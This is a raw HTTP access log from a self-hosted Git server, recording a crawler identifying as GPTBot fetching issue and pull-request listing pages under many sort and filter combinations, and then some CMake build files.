"/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10258] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11439] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11441] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14339] [Gzip 9.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11383] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:19:18:08 